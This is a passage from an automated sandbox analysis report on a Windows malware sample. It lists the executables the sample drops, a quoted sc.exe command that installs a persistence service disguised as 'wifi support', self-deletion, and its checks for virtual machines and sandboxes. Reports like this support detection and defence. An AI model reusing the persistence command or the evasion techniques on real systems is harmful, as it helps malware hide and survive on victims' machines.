                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\13C.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2D8F.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8058.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe (copy)Jump to dropped file
                      Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ceaplexz
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\gnxg5xlbeh.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ttfssdi:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\BackgroundTransferHost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\BackgroundTransferHost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after checking mutex)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: ttfssdi, 00000013.00000002.354469591.0000000000757000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                      Source: 6B9B.exe, 0000001A.00000002.375624964.000000000069B000.00000004.00000020.sdmpBinary or memory string: ASWHOOK<
                      Found evasive API chain (may stop execution after checking locale)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ttfssdiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00406AA0
                      Found evasive API chain (may stop execution after checking computer name)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\System32\svchost.exe TID: 6680Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\8058.exe TID: 5688Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6248Thread sleep count: 41 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6248Thread sleep time: -41000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 561
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeAPI coverage: 0.3 %
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeAPI coverage: 5.9 %
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00406AA0
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D9EC.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\54D0.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4955.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6E36.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1523.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\74DE.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6471.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2205.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\13C.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2D8F.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeEvaded block: after key decision
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeAPI call chain: ExitProcess graph end node
                      Source: explorer.exe, 00000004.00000000.279552948.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                      Source: WerFault.exe, 0000001B.00000003.406682814.000000000548F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                      Source: explorer.exe, 00000004.00000000.280593120.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}u
                      Source: explorer.exe, 00000004.00000000.280593120.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000004.00000000.279552948.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000006.00000002.567765167.000002717EE5F000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                      Source: explorer.exe, 00000004.00000000.263925522.00000000089B5000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}PS0
                      Source: svchost.exe, 00000006.00000002.543608482.000002717D629000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW /
                      Source: svchost.exe, 00000006.00000002.567503250.000002717EE52000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.411996831.000000000542B000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.409119888.000000000542A000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.408591760.0000000005422000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000004.00000000.287942603.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                      Source: explorer.exe, 00000004.00000000.280593120.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}sets
                      Source: explorer.exe, 00000004.00000000.279618255.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                      Source: explorer.exe, 00000004.00000000.290664995.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                      Source: explorer.exe, 00000004.00000000.280593120.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}les
                      Source: WerFault.exe, 0000001B.00000003.408920884.0000000005498000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.412119669.0000000005498000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.409044949.0000000005498000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWh+C
                      Source: explorer.exe, 00000004.00000000.279618255.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                      Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.542213071.0000026E7CE2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00419C64 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00419E04 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
